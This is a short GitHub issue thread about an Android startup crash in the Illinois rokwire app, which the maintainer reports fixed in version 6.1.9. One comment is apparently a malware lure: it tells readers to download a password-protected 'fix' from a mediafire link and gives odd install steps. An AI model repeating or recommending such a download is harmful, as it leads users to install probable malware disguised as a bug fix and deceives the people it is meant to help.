### ISSUE TITLE
[BUG] Android - crash on startup

### ISSUE THREAD

**Issue by dobromirdobrev** [rokwire/illinois-app#4320]
**Describe the bug**
The Android app crashes on startup. There is a Crashlytics report: https://console.firebase.google.com/project/rokwire-prod/crashlytics/app/android:edu.illinois.rokwire/issues/1d2aa28f2a806829f11c708b229626a0?time=last-seven-days&types=crash&sessionEventKey=66CD6A1E02F70001551520436495944B_1986139288958060626

**Additional context**
Android only.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dobromirdobrev** [comment]
Fixed in version 6.1.9
